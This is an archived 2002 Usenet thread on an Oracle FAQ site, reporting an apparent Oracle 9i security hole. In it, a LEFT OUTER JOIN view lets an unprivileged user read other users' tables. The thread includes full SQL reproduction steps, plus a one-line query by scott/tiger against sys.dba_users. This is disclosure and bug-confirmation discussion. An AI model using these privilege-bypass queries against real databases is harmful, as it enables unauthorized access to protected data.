Oracle FAQ Your Portal to the Oracle Knowledge Grid
HOME | ASK QUESTION | ADD INFO | SEARCH | E-MAIL US
 

Home -> Community -> Usenet -> c.d.o.server -> Re: 9iDB Security Hole?

Re: 9iDB Security Hole?

From: santosh sharma <santysharma_at_yahoo.com>
Date: Mon, 15 Apr 2002 11:48:47 -0700
Message-ID: <a9f7fq$2qdvn$1@ID-84096.news.dfncis.de> 





looks like a BIG one


check this out


connect scott/tiger


select * from sys.dba_users a left outer join sys.dba_users on
dba_users.user_id = a.user_id


Oracle 9.0.1.1.1 on NT



santy





"Vladimir M. Zakharychev" <bob_at_dpsp-yes.com> wrote in message
news:a9et5g$9sa$1_at_babylon.agtel.net...


> Anyone with 9i can confirm this?

>

> From: news [mailto:news_at_host.talk.ru] On Behalf Of ...

> ...relcom.comp.dbms.oracle

>

>

> connect  system/****@database

> CREATE USER us1 IDENTIFIED BY us11 DEFAULT TABLESPACE users TEMPORARY

> TABLESPACE temp;

> CREATE USER us2 IDENTIFIED BY us12 DEFAULT TABLESPACE users TEMPORARY

> TABLESPACE temp;

> Grant Create  Session To us1;

> Grant Create  Session To us2;

> Grant Create Table To us1;

> grant unlimited tablespace to us1;

> Grant Create View To us2;

>

> Connect us1/us11_at_database;

> Create Table t1(c1 Number(1));

> Insert Into t1(c1) Values(9);

> Create Table t2(c1 Number(1));

> Insert Into t2(c1) Values(9);

>

> commit;

> Connect us2/us11_at_database;

>

> SQL> Select * From us1.t1;

> ORA-00942: table or view does not exist

> -- this is expected

> SQL> Select * From us1.t2;

> ORA-00942: table or view does not exist

> -- this one too

> SQL> Create View aa As Select * From us1.t1;

> ORA-00942: table or view does not exist

> -- and this one

> SQL> Create View aa As Select t1.c1 As t1_c1, t2.c1 As t2_c1

> >From us1.t1 Left Outer Join us1.t2 On t1.c1 = t2.c1;

>

> View created

> -- now this one is NOT !!!!!

> SQL> select * from aa;

>

> T1_C1 T2_C1

> ---- ----

>    9    9

>

>

> This effectively means that LEFT OUTER JOIN allows to create views

> on tables that are normally not visible (provided that unprivileged user

> knows table and column names).

> If you can confirm this basic example, can you also try it on system

> catalog tables/views? If you can not confirm, please specify your version

> and platform so that we know which ones are not affected (poster didn't

> specify version, but I suggest it's 9.0.1.1 on either NT or Linux).

>

> --

> Vladimir Zakharychev (bob_at_dpsp-yes.com)

http://www.dpsp-yes.com


> Dynamic PSP(tm) - the first true RAD toolkit for Oracle-based internet

applications.


> All opinions are mine and do not necessarily go in line with those of my

employer.


>

>

>

Received on Mon Apr 15 2002 - 13:48:47 CDT












Original text of this message













  HOME |
  ASK QUESTION |
  ADD INFO |
  SEARCH |
  E-MAIL US